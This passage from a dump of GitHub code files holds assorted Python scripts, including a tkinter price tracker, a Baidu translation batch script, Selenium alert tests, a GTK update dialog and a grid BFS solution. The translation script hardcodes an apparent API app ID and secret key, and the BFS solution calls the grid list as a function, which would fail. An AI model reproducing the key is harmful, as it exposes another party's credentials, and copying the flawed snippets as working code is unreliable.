font=(\"Times\", \"20\"))\n set_time_label.place(x=60, y=460)\n set_time = Entry(root, textvariable=initial_time, font=(\"Times\", \"20\"),\n width=3)\n set_time.place(x=180, y=460)\n\n # increment time\n increment_image = 'images/increment_triangle.jpg'\n increment_image_icon = ImageTk.PhotoImage(Image.open(increment_image))\n increment_button = Button(root, command=increment_value)\n increment_button.place(x=235, y=462)\n increment_button.config(image=increment_image_icon)\n\n # decrement time\n decrement_image = 'images/decrement_triangle.jpg'\n decrement_image_icon = ImageTk.PhotoImage(Image.open(decrement_image))\n decrement_button = Button(root, command=decrement_value)\n decrement_button.place(x=235, y=478)\n decrement_button.config(image=decrement_image_icon)\n\n # dropdown time type\n initial_time_type_variable = StringVar()\n initial_time_type_variable.set('Days')\n initial_time_type_values = {'Minutes', 'Hours',\n 'Days', 'Weeks', 'Months', 'Years'}\n initial_time_type_drp = OptionMenu(\n root, initial_time_type_variable, *initial_time_type_values)\n initial_time_type_drp.place(x=260, y=460)\n\n # # save button\n save_button = Button(root, 
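A hedged alternative to the hand-rolled `increment_value`/`decrement_value` buttons used here: `tk.Spinbox` provides the same clamped up/down behaviour natively.

```python
# Sketch: a Spinbox bound to the same IntVar replaces the two image buttons
# and their increment/decrement callbacks.
import tkinter as tk

root = tk.Tk()
initial_time = tk.IntVar(value=1)
tk.Spinbox(root, from_=0, to=9999, textvariable=initial_time,
           font=("Times", 20), width=3).pack()
root.mainloop()
```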
text=\"Save\",\n font=(\"Times\", \"20\", \"bold italic\"), command=all_details)\n save_button.place(x=300, y=500)\n\n # status\n status_variable = StringVar()\n status_variable.set(\"Ready\")\n status_label = Label(\n root, textvariable=status_variable, anchor=\"nw\", fg='red', relief=SUNKEN)\n status_label.pack(fill=X, side=BOTTOM)\n\n root.configure()\n root.mainloop()\n","repo_name":"abhishekgoyal-a11y/Price-tracker-app","sub_path":"pricetracker_app.py","file_name":"pricetracker_app.py","file_ext":"py","file_size_in_byte":27013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34193626502","text":"#!/usr/bin/env python3\n\nimport glob\nimport json\nimport sys\nfrom tp_utils import *\n\n\nfriends_folder = 'friends/'\nfixed_folder = 'fixed_friends/'\nachdir = 'achievements/'\nsummarydir = 'summaries/'\nstatsdir = 'stats/'\nusers = set()\nvisited = set()\nfriends = {}\n\nfor user in glob.glob(achdir + '*.json'):\n users.add(int(user[len(achdir):-5]))\n\nfor user in glob.glob(statsdir + '*.json'):\n users.add(int(user[len(statsdir):-5]))\n\nfor user in glob.glob(summarydir + '*.json'):\n users.add(int(user[len(summarydir):-5]))\n\nfor uid in users:\n\twith open(friends_folder + '/{0}.json'.format(uid), 'r') as ufile:\n\t\tujson = json.load(ufile)\n\t\tufile.close()\n\tvisited.add(uid)\n\tfriends[uid] = {}\n\tif len(ujson) is not 0:\n\t\tfor friend in ujson['friendslist']['friends']:\n\t\t\tfriends[uid][int(friend['steamid'])] = int(friend['friend_since'])\n\nfor uid in friends:\n\tfriends[uid] = { k: friends[uid][k] for k in friends[uid] if k in visited }\n\nfor uid in friends:\n\tfor fid in friends[uid]:\n\t\tfriends[fid][uid] = friends[uid][fid]\n\nfor uid in friends:\n\twith open(fixed_folder + '/{0}.json'.format(uid), 'w') as ffile:\n\t\tffile.write(json.dumps({ 'friendslist': { 'friends': [ { 'steamid': k, 'relationship': 'friend', 'friend_since': friends[uid][k] } for k in friends[uid] ] } }))\n\t\tffile.close()\n","repo_name":"marcoffee/IBD-TP2","sub_path":"codes/user_fix.py","file_name":"user_fix.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14372103332","text":"\"\"\"\nRunner Program to simulate pruning of a minmax tree\n\nDate: August 4th, 2021\nAuthors: Keval Varia, Muskan Israni\nStudent ID: 017834282, 017537908\nClass: CECS 451- Artificial Intelligence\n\"\"\"\n\nfrom Tree import *\n\n\ndef main():\n # variable declaration\n small_tree = Tree()\n big_tree = Tree()\n inputFile1 = \"tree1.txt\"\n inputFile2 = \"tree2.txt\"\n\n # read input file into a tree\n print(\"\\nPart I: Import data from CSV file to Tree structure\\n\")\n small_tree.populateTree(inputFile1)\n big_tree.populateTree(inputFile2)\n\n # part 2 - perform a minimax algorithm (w/o alpha-beta) on both trees generated above\n small_tree.minimaxSimple(small_tree.root, small_tree.get_depth())\n big_tree.minimaxSimple(big_tree.root, big_tree.get_depth())\n\n # display the results of the minmax algorithm run in the step above for both trees\n print(\"Part II - Small File: Minimax:\")\n small_tree.DFS_traversal()\n print(\"\\nPart II - Big File: Minimax:\")\n big_tree.DFS_traversal()\n\n # part 3 - perform a minimax algorithm (w alpha-beta pruning) on both trees generated above\n print(\"\\n\\nPart III - Small File - Minimax w/ Alpha-Beta:\")\n small_tree.minimaxComplex(small_tree.root, small_tree.get_depth())\n print(\"\\nPart III - Big File - Minimax 
w/ Alpha-Beta:\")\n big_tree.minimaxComplex(big_tree.root, big_tree.get_depth())\n\n # display the results of the minmax algorithm run in the step above for both trees\n for item in small_tree.get_nodes():\n node = small_tree.nodes[item]\n print(node.get_id(), \"[\", node.get_weight(), \"]\", node.get_pruned())\n for item in big_tree.get_nodes():\n node = big_tree.nodes[item]\n print(node.get_id(), \"[\", node.get_weight(), \"]\", node.get_pruned())\n\n\n# auto-run main method at program launch/run\nif __name__ == '__main__':\n main()\n","repo_name":"muskaanisrani/CECS451-Artificial-Intelligence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27044004779","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n调用「百度翻译 API」实现英汉互译及多语言翻译\n@Author: Newyee\n@Python: 3.6.5\n@Create: 2019-04-18\n\"\"\"\n# 导入相关模块\nimport hashlib\nimport random\nimport requests\nimport time\nimport os\n\n# 你的APP ID\nappID = '20210107000665791'\n# 你的密钥\nsecretKey = 'Mhfzq9mjZ9FtKa7fZY3u'\n# 百度翻译 API 的 HTTP 接口\napiURL = 'http://api.fanyi.baidu.com/api/trans/vip/translate'\n\n\ndef baiduAPI_translate(query_str, to_lang):\n '''\n 传入待翻译的字符串和目标语言类型,请求 apiURL,自动检测传入的语言类型获得翻译结果\n :param query_str: 待翻译的字符串\n :param to_lang: 目标语言类型\n :return: 翻译结果字典\n '''\n # 生成随机的 salt 值\n salt = str(random.randint(32768, 65536))\n # 准备计算 sign 值需要的字符串\n pre_sign = appID + query_str + salt + secretKey\n # 计算 md5 生成 sign\n sign = hashlib.md5(pre_sign.encode()).hexdigest()\n # 请求 apiURL 所有需要的参数\n params = {\n 'q': query_str,\n 'from': 'auto',\n 'to': to_lang,\n 'appid': appID,\n 'salt':salt,\n 'sign': sign\n }\n try:\n # 直接将 params 和 apiURL 一起传入 requests.get() 函数\n response = requests.get(apiURL, params=params)\n # 获取返回的 json 数据\n result_dict = response.json()\n # 得到的结果正常则 return\n if 'trans_result' in result_dict:\n return result_dict\n else:\n print('Some errors occured:\\n', result_dict)\n except Exception as e:\n print('Some errors occured: ', e)\n\n\ndef baiduAPI_translate_main(query_str, dst_lang=''):\n '''\n 解析翻译结果后输出,默认实现英汉互译\n :param query_str: 待翻译的字符串,必填\n :param dst_lang: 目标语言类型,可缺省\n :return: 翻译后的字符串\n '''\n if dst_lang:\n # 指定了目标语言类型,则直接翻译成指定语言\n result_dict = baiduAPI_translate(query_str, dst_lang)\n else:\n # 未指定目标语言类型,则默认进行英汉互译\n result_dict = baiduAPI_translate(query_str, 'zh')\n if result_dict['from'] == 'zh':\n result_dict = baiduAPI_translate(query_str, 'en')\n # 提取翻译结果字符串,并输出返回\n try:\n dst = result_dict['trans_result'][0]['dst']\n except Exception as e:\n with open(\".\\\\notTranslate.txt\",\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(query_str)\n file_handle.write('\\n')\n return None\n\n # print('{}: {} -> {}: {}'.format(result_dict['from'], query_str, result_dict['to'], dst))\n return dst\n\ndef enToChina(enText):\n chText = baiduAPI_translate_main(enText)\n time.sleep(1)\n return chText\n\nif __name__ == '__main__':\n preDataDir = './extractData'\n for file in os.listdir(preDataDir):\n file_name = preDataDir + \"\\\\\" + file\n if 'question' not in file_name:\n continue\n if 'train' not in file_name:\n continue\n print(\"处理:\"+file_name)\n filein = open(file_name, \"r\",encoding='UTF-8')\n\n codeFileName = ''\n if 'train' in file_name:\n codeFileName = preDataDir + \"\\\\\" + 'answer_conala-train.json.txt'\n else:\n codeFileName = preDataDir + \"\\\\\" + 'answer_conala-test.json.txt'\n fileCode = open(codeFileName, 
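For reference alongside the minimax runner above (whose `Tree` class lives in that repo and is not shown here), a self-contained sketch of minimax with alpha-beta pruning over a plain nested-list game tree:

```python
# Hedged, generic alpha-beta: leaves are numbers, internal nodes are lists,
# and levels alternate between maximizing and minimizing players.
def alphabeta(node, maximizing, alpha=float("-inf"), beta=float("inf")):
    if isinstance(node, (int, float)):          # leaf: static evaluation
        return node
    if maximizing:
        best = float("-inf")
        for child in node:
            best = max(best, alphabeta(child, False, alpha, beta))
            alpha = max(alpha, best)
            if beta <= alpha:                   # prune remaining children
                break
        return best
    best = float("inf")
    for child in node:
        best = min(best, alphabeta(child, True, alpha, beta))
        beta = min(beta, best)
        if beta <= alpha:
            break
    return best

tree = [[3, 5], [6, [9, 1]], [1, 2]]
print(alphabeta(tree, True))   # 6 for this tree
```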
\"r\",encoding='UTF-8')\n\n translateList = []\n resultList = []\n codeList = []\n for line in filein.readlines():\n # print(line)\n line = line.replace('[wrap]','\\n').replace('[tab]','\\t').replace('[enter]','\\r')\n translateList.append(line)\n for line in fileCode.readlines():\n # print(line)\n codeList.append(line)\n if len(codeList)!= len(translateList):\n print(\"error:translateList 与 codeList 长度不同!\")\n else:\n\n for index in range(0,len(translateList)):\n # print(translateList[index])\n chText = enToChina(str(translateList[index]))\n # resultList.append(chText)\n if chText:\n with open(\".\\\\chData\\\\ch_new_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(chText)\n file_handle.write('\\n')\n with open(\".\\\\chData\\\\pre_new_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(translateList[index])\n file_handle.write('\\n')\n\n with open(\".\\\\chData\\\\code_new_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(codeList[index])\n file_handle.write('\\n')\n print(\"结束处理:\"+file_name)\n # 保存结果\n # if len(resultList) > 0:\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format('question_conala-train.json.txt'),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # preDataDir = './extractData'\n # for file in os.listdir(preDataDir):\n # file_name = preDataDir + \"\\\\\" + file\n # if 'question' not in file_name:\n # continue\n # filein = open(file_name, \"r\",encoding='UTF-8')\n #\n # translateList = []\n # resultList = []\n # for line in filein.readlines():\n # print(line)\n # translateList.append(line)\n # for item in translateList:\n # chText = enToChina(str(item))\n # resultList.append(chText)\n # if len(resultList) > 1000:\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # resultList.clear()\n # # 保存结果\n # if len(resultList) > 0:\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # baiduAPI_translate_main('This is English.')\n # baiduAPI_translate_main('这是中文')\n # baiduAPI_translate_main('翻译成法语', 'fra')","repo_name":"Wang-future/audioProgram","sub_path":"code/audioProgram/processData/extractConala/enToChina.py","file_name":"enToChina.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6994894005","text":"import time\n\nfrom Base import initialiseDriver, commonMethods\nfrom Pages import alert_page\nfrom selenium import webdriver\nwebdriver.Chrome()\n\ndef test_verify_simple_alert_accept():\n browser = initialiseDriver.startBrowser('https://www.way2automation.com/way2auto_jquery/alert.php#load_box')\n c = commonMethods.commonMethods(browser)\n a = alert_page.Alerts(browser, 'Alerts')\n c.switch_to_iframe('iframe_xpath', 'Alerts')\n 
a.click_button('click_simple_alertbox_xpath')\n a.click_simple_alert_box()\n\ndef test_verify_input_alert_accept():\n browser = initialiseDriver.startBrowser('https://www.way2automation.com/way2auto_jquery/alert.php#load_box')\n c = commonMethods.commonMethods(browser)\n a = alert_page.Alerts(browser, 'Alerts')\n a.click_button('input_section_xpath')\n c.switch_to_iframe('iframe1_xpath', 'Alerts')\n a.click_button('click_inputbox_xpath')\n time.sleep(3)\n a.click_input_alert_box()\n time.sleep(3)\n c.switch_to_iframe('iframe1_xpath', 'Alerts')\n a.click_button('click_inputbox_xpath')\n a.dismiss_alert_box()\n time.sleep(3)\n","repo_name":"ysingh03/E2E_framwork_selenium_python","sub_path":"TC/test_alerts.py","file_name":"test_alerts.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12608332286","text":"import threading\n\nimport pygtk\npygtk.require('2.0')\nimport gtk\nimport gobject\n\nfrom message import Message\nfrom core.service_update import ServiceUpdate\n\nimport media\nimport core.cons as cons\n\nclass UpdateManager(gtk.Dialog, ServiceUpdate):\n\t\"\"\"\"\"\"\n\tdef __init__(self, parent, config, info=None):\n\t\t\"\"\"\"\"\"\n\t\tgtk.Dialog.__init__(self)\n\t\tServiceUpdate.__init__(self, config)\n\t\tself.set_transient_for(parent)\n\t\tself.parent_widget = parent\n\n\t\tself.installing = False\n\t\tself.checking_version = False\n\t\tself.remote_info = info\n\n\t\tself.set_icon_from_file(media.ICON_UPDATE)\n\t\tself.set_title((\"Update Manager\"))\n\t\tself.set_size_request(400,300)\n\n\t\t# treeview\n\t\tframe = gtk.Frame()\n\t\tself.vbox.pack_start(frame)\n\t\tframe.set_size_request(200, -1)\n\t\tframe.set_border_width(10)\n\t\tlabel = gtk.Label()\n\t\tlabel.set_markup(\"%s\" % (\"Update Services\"))\n\t\tframe.set_label_widget(label)\n\t\tscroll = gtk.ScrolledWindow()\n\t\tframe.add(scroll)\n\t\tscroll.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)\n\t\tself.treeview = gtk.TreeView(gtk.ListStore(gtk.gdk.Pixbuf, str, bool, str, gobject.TYPE_PYOBJECT))\n\t\tscroll.add(self.treeview)\n\n\t\tself.treeview.set_rules_hint(True)\n\t\tself.treeview.set_headers_visible(False)\n\n\t\ttree_icon = gtk.TreeViewColumn('Icon') \n\t\ticon_cell = gtk.CellRendererPixbuf()\n\t\ttree_icon.pack_start(icon_cell, True)\n\t\ttree_icon.add_attribute(icon_cell, 'pixbuf', 0)\n\t\ttree_icon.set_property('min-width', 100)\n\t\tself.treeview.append_column(tree_icon)\n\n\t\ttree_name = gtk.TreeViewColumn('Name') \n\t\tname_cell = gtk.CellRendererText()\n\t\ttree_name.pack_start(name_cell, True)\n\t\ttree_name.add_attribute(name_cell, 'text', 1)\n\t\ttree_name.set_property('min-width', 200)\n\t\tself.treeview.append_column(tree_name)\n\n\t\ttree_add = gtk.TreeViewColumn('Add')\n\t\tadd_cell = gtk.CellRendererToggle()\n\t\tadd_cell.connect(\"toggled\", self.toggled)\n\t\ttree_add.pack_start(add_cell, True)\n\t\ttree_add.add_attribute(add_cell, 'active', 2)\n\t\tself.treeview.append_column(tree_add)\n\n\t\t#status\n\t\thbox = gtk.HBox()\n\t\tself.vbox.pack_start(hbox, False, False, 5)\n\n\t\tself.status_icon = gtk.image_new_from_stock(gtk.STOCK_REFRESH, gtk.ICON_SIZE_MENU)\n\t\thbox.pack_start(self.status_icon, False, False, 10)\n\t\tself.status_label = gtk.Label(\"Checking for updates.\")\n\t\thbox.pack_start(self.status_label, False, False, 5)\n\t\tself.progress = gtk.ProgressBar()\n\t\thbox.pack_start(self.progress, True, True, 20)\n\n\t\t#action area\n\t\tcancel_button = gtk.Button(None, 
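The alert tests above pace themselves with fixed `time.sleep(3)` calls, which is slow when the page is fast and flaky when it is slower. A sketch with an explicit wait, assuming a local chromedriver and that some click on the page has triggered a JavaScript alert:

```python
# Hedged sketch: WebDriverWait proceeds as soon as the alert exists instead
# of sleeping a fixed three seconds.
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Chrome()
driver.get("https://www.way2automation.com/way2auto_jquery/alert.php")
# ... click whatever control raises the alert here ...
alert = WebDriverWait(driver, 10).until(EC.alert_is_present())
alert.accept()
driver.quit()
```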
gtk.STOCK_CANCEL)\n\t\tadd_button = gtk.Button(None, gtk.STOCK_ADD)\n\t\tself.action_area.pack_start(cancel_button)\n\t\tself.action_area.pack_start(add_button)\n\t\tcancel_button.connect(\"clicked\", self.close)\n\t\tadd_button.connect(\"clicked\", self.install)\n\n\t\tself.connect(\"response\", self.close)\n\t\tself.show_all()\n\n\t\tself.progress.hide()\n\n\t\tgobject.timeout_add(200, self.load_updates)\n\n\t\tself.run()\n\n\tdef load_updates(self):\n\t\t\"\"\"\"\"\"\n\t\tif not self.checking_version:\n\t\t\tself.checking_version = True\n\t\t\tif self.get_updates():\n\t\t\t\tself.check_updates()\n\t\t\telse:\n\t\t\t\tif self.remote_version == None:\n\t\t\t\t\ttitle = \"Not available!\"\n\t\t\t\t\tmessage = \"Update Manager can't connect to server.\\nTry again later.\"\n\t\t\t\telif self.remote_outdated:\n\t\t\t\t\ttitle = \"Brand new!\"\n\t\t\t\t\t#message = \"Version %s\\nHas no updates available yet.\" % cons.TUCAN_VERSION\n\t\t\t\t\tmessage = \"Version %s\\nRC releases have no updates.\" % cons.TUCAN_VERSION\n\t\t\t\telse:\n\t\t\t\t\ttitle = \"Outdated!\"\n\t\t\t\t\tmessage = \"Version %s released!\\nPlease update and enjoy new features.\" % self.remote_version\n\t\t\t\tMessage(self, cons.SEVERITY_ERROR, title, message)\n\t\t\t\tgobject.idle_add(self.close)\n\t\t\tself.checking_version = False\n\n\tdef toggled(self, button, path):\n\t\t\"\"\"\"\"\"\n\t\tmodel = self.treeview.get_model()\n\t\tactive = True\n\t\tif button.get_active():\n\t\t\tactive = False\n\t\tbutton.set_active(active)\n\t\tmodel.set_value(model.get_iter(path), 2, active)\n\n\tdef check_updates(self):\n\t\t\"\"\"\"\"\"\n\t\tmodel = self.treeview.get_model()\n\t\tdefault_icon = gtk.gdk.pixbuf_new_from_file_at_size(media.ICON_UPDATE, 32, 32)\n\n\t\tupdated = 0\n\t\tnew = 0\n\t\tfor service, options in self.updates.items():\n\t\t\tif options[2]:\n\t\t\t\ticon = gtk.gdk.pixbuf_new_from_file_at_size(options[2], 32, 32)\n\t\t\t\tupdated += 1\n\t\t\telse:\n\t\t\t\ticon = default_icon\n\t\t\t\tnew += 1\n\t\t\tif model:\n\t\t\t\tmodel.append([icon, service, False, options[0], options[1]])\n\n\t\tself.status_icon.set_from_stock(gtk.STOCK_DIALOG_WARNING, gtk.ICON_SIZE_BUTTON)\n\t\tself.status_label.set_label(\"%i New and %i Updated.\" % (new, updated))\n\t\tif updated == 0 and new == 0:\n\t\t\tgobject.timeout_add_seconds(5, self.close)\n\n\tdef install(self, button):\n\t\t\"\"\"\"\"\"\n\t\tself.progress.show()\n\t\tself.status_icon.set_from_stock(gtk.STOCK_GO_DOWN, gtk.ICON_SIZE_MENU)\n\t\tself.status_label.set_label(\"Installing\")\n\t\tself.action_area.set_sensitive(False)\n\t\tth = threading.Thread(group=None, target=self.install_all, name=None)\n\t\tth.start()\n\n\tdef install_all(self):\n\t\t\"\"\"\"\"\"\n\t\tself.installing = True\n\t\tmodel = self.treeview.get_model()\n\n\t\tinstall_targets = []\n\t\tupdate_iter = model.get_iter_root()\n\t\twhile update_iter:\n\t\t\tif model.get_value(update_iter, 2):\n\t\t\t\tinstall_targets.append(model.get(update_iter, 1, 3, 4))\n\t\t\tupdate_iter = model.iter_next(update_iter)\n\t\tif len(install_targets) > 0:\n\t\t\tcont = 0\n\t\t\tself.progress.set_text(\"%i of %i\" % (cont, len(install_targets)))\n\t\t\tfor service_name, service_dir, archive in install_targets:\n\t\t\t\tif self.install_service(service_name, service_dir, archive):\n\t\t\t\t\tcont += 1\n\t\t\t\t\tself.progress.set_fraction(float(cont)/len(install_targets))\n\t\t\t\t\tself.progress.set_text(\"%i of %i\" % (cont, len(install_targets)))\n\t\t\tif cont != len(install_targets):\n\t\t\t\tmessage = \"Problem updating some 
services \\nTry again later.\"\n\t\t\telse:\n\t\t\t\tmessage = \"Save your configuration and restart Tucan \\nto apply service changes.\"\n\t\t\tgobject.idle_add(self.restart, message)\n\t\t\tself.installing = False\n\t\t\tgobject.idle_add(self.close)\n\t\telse:\n\t\t\tself.installing = False\n\t\t\tgobject.idle_add(self.close)\n\n\tdef restart(self, message):\n\t\t\"\"\"\"\"\"\n\t\tMessage(self.parent_widget, cons.SEVERITY_WARNING, \"Restart Needed.\", message)\n\n\tdef close(self, widget=None, other=None):\n\t\t\"\"\"\"\"\"\n\t\tif not self.installing:\n\t\t\tself.destroy()\n\nif __name__ == \"__main__\":\n\tfrom config import Config\n\tx = UpdateManager(None, Config(), None)\n","repo_name":"richjdowney/immigration_data_etl_analysis","sub_path":"src/ui/gtk/update_manager.py","file_name":"update_manager.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29511232276","text":"import requests\nimport json\ndef requests_load(idx):\n headers = {\"Content-Type\": \"application/json;charset=utf8\"}\n url = \"http://127.0.0.1:8388/miniapi/event/getcamera\"\n _data = {\n\n \n \"cameraid\": str(idx)\n \n\n }\n\n res = requests.post(url=url, headers=headers, json=_data).text\n return res\n\n","repo_name":"xiaojunjun65/G235","sub_path":"utils/http_seve.py","file_name":"http_seve.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"26539904007","text":"'''\n문제 : 단지번호 붙이기\n난이도 : 실버 1\n링크 : https://www.acmicpc.net/problem/2667\n'''\n\nfrom collections import deque\n\nn = int(input())\ngraph = []\nfor _ in range(n):\n graph.append(list(map(int, input())))\ndx = [0, 0, -1, 1]\ndy = [1, -1, 0, 0]\n\n#단지의 세대 수\nnums = []\ncount = 0\n\ndef dfs(x, y):\n if x < 0 or x >= n or y < 0 or y >= n:\n return False\n if graph[x][y] == 1:\n global count\n count += 1\n graph[x][y] = 0\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n dfs(nx, ny)\n return True\n return False\n\ndef bfs(x, y):\n global graph\n n = len(graph)\n q = deque()\n q.append((x, y))\n graph[x][y] = 0\n count = 1\n \n while q:\n # 큐에 들어있는 친구 하나 뽑고 상하좌우 체크\n x, y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx < 0 or nx >= n or ny < 0 or ny >= n:\n continue\n # 만약 주변에 집이 있으면, 큐에 해당 좌표를 늘려주고 현재 집은 0으로 미방문되도록 설정\n # count += 1 해줘서 단지 내 집 개수 추가\n if graph[nx][ny] == 1:\n q.append((nx, ny))\n graph[nx][ny] = 0\n count += 1\n return count\n\n\nfor i in range(n):\n for j in range(n):\n # 모임인 집이 존재한다면\n # dfs 풀이\n '''\n if dfs(i, j) == True:\n nums.append(count)\n count = 0\n '''\n # bfs 풀이\n if graph(i, j) == 1:\n nums.append(bfs(i, j))\n \n\nnums.sort()\nprint(len(nums))\nfor i in nums:\n print(i)","repo_name":"kkkapuq/PS_study","sub_path":"Boong/Python/백준/DFS,BFS/230319_백준_2667_단지번호 붙이기/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26490044924","text":"# task3\r\nfrom functools import wraps\r\n\r\n\r\ndef arg_rules(type_: type, max_length: int, contains: list):\r\n def stopwords_inner(func):\r\n @wraps(func)\r\n def wrap(*args, **kwargs):\r\n res = func(*args, **kwargs)\r\n user_name = ''.join(args)\r\n\r\n if len(user_name) > max_length:\r\n return \"User name cannot hold more than 15 chars\"\r\n if not isinstance(user_name, type_):\r\n return \"User name must be a string\"\r\n for 
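On the 단지번호 (housing-complex numbering) solution above: the driver loop is written `if graph(i, j) == 1:`, which calls the list and raises `TypeError`; indexing `graph[i][j]` is clearly intended. A self-contained flood-fill of the same shape with that fixed:

```python
# Hedged rewrite: BFS flood-fill that returns the sorted sizes of all
# connected groups of 1s in an n-by-n grid.
from collections import deque

def complex_sizes(grid):
    n = len(grid)
    grid = [row[:] for row in grid]        # don't mutate the caller's grid
    sizes = []
    for si in range(n):
        for sj in range(n):
            if grid[si][sj] != 1:
                continue
            grid[si][sj] = 0               # mark visited
            count, q = 1, deque([(si, sj)])
            while q:
                x, y = q.popleft()
                for dx, dy in ((0, 1), (0, -1), (1, 0), (-1, 0)):
                    nx, ny = x + dx, y + dy
                    if 0 <= nx < n and 0 <= ny < n and grid[nx][ny] == 1:
                        grid[nx][ny] = 0
                        count += 1
                        q.append((nx, ny))
            sizes.append(count)
    return sorted(sizes)

print(complex_sizes([[0, 1, 1], [0, 1, 0], [1, 0, 0]]))  # [1, 3]
```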
word in contains:\r\n if word not in user_name:\r\n return 'Should contain needed characters'\r\n return res\r\n\r\n return wrap\r\n\r\n return stopwords_inner\r\n\r\n pass\r\n\r\n\r\n@arg_rules(type_=str, max_length=15, contains=['05', '@'])\r\ndef create_slogan(name: str) -> str:\r\n return f\"{name} drinks pepsi in his brand new BMW!\"\r\n\r\n\r\nslogan = create_slogan('Clown205@')\r\nprint(slogan)","repo_name":"DantesMindless/lesson14","sub_path":"task14-3.py","file_name":"task14-3.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74575529080","text":"import asyncio\nimport os\nimport os.path\nimport sys\nfrom datetime import datetime\n\nimport asyncpg.exceptions\nimport click\nimport click_datetime\nfrom alembic.command import upgrade\nfrom alembic.config import Config\n\nfrom puckdb import db, fetch, server\n\nDATE_PARAM = click_datetime.Datetime(format='%Y-%m-%d')\n\n\ndef abort_if_false(ctx, _, value):\n if not value:\n ctx.abort()\n\n\ndef _setup():\n loop.run_until_complete(db.setup())\n\n\n@click.command(help='Initialize the database')\ndef init():\n loc = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n config = Config(os.path.join(loc, 'alembic.ini'))\n upgrade(config, 'head')\n teams()\n\n\n@click.command(help='Get all teams')\ndef teams():\n loop.run_until_complete(fetch.get_teams())\n\n\n@click.command(help='Remove all data from the database')\n@click.option('--yes', is_flag=True, callback=abort_if_false,\n expose_value=False,\n prompt='Are you sure you want to drop the database?')\ndef drop():\n db.drop()\n\n\n@click.command()\n@click.option('--from-date', type=DATE_PARAM, default=datetime(2016, 10, 1))\n@click.option('--to-date', type=DATE_PARAM, default=datetime.now())\ndef get(from_date, to_date):\n try:\n games = loop.run_until_complete(fetch.get_games(from_date=from_date, to_date=to_date))\n click.echo(f'Fetched {len(games)} games')\n if games:\n click.echo(f'First: {games[0][\"id\"]}')\n click.echo(f'Most recent: {games[-1][\"id\"]}')\n except asyncpg.exceptions.UndefinedTableError:\n click.echo('ERROR: Please run `puckdb init` to initialize this DB first.')\n sys.exit(1)\n\n\n@click.command()\ndef serve():\n server.run(loop)\n\n\n@click.group()\n@click.version_option()\ndef main():\n if not os.getenv('PUCKDB_DB_DATABASE'):\n click.echo('ERROR: `PUCKDB_DB_DATABASE` environment variable not specified.')\n sys.exit(1)\n _setup()\n\n\nmain.add_command(get)\nmain.add_command(init)\nmain.add_command(teams)\nmain.add_command(drop)\nmain.add_command(serve)\n\nloop = asyncio.get_event_loop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"aaront/puckdb","sub_path":"puckdb/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"21839605202","text":"import numpy as np\n\n\nclass Board():\n def __init__(self) -> None:\n self.board = np.zeros((3,3))\n self.markers = [[2,2,2],[2,2,2]]\n self.moves = []\n \n def check_winner(self):\n if np.any(np.all(self.board > 0, axis=0)):\n return 1\n if np.any(np.all(self.board > 0, axis=1)):\n return 1\n if np.any(np.all(self.board < 0, axis=0)):\n return -1\n if np.any(np.all(self.board < 0, axis=1)):\n return -1\n\n if (self.board[0,0] > 0) and (self.board[1,1] > 0) and (self.board[2,2] > 0):\n return 1\n if (self.board[0,2] > 0) and (self.board[1,1] > 0) and (self.board[2,0] 
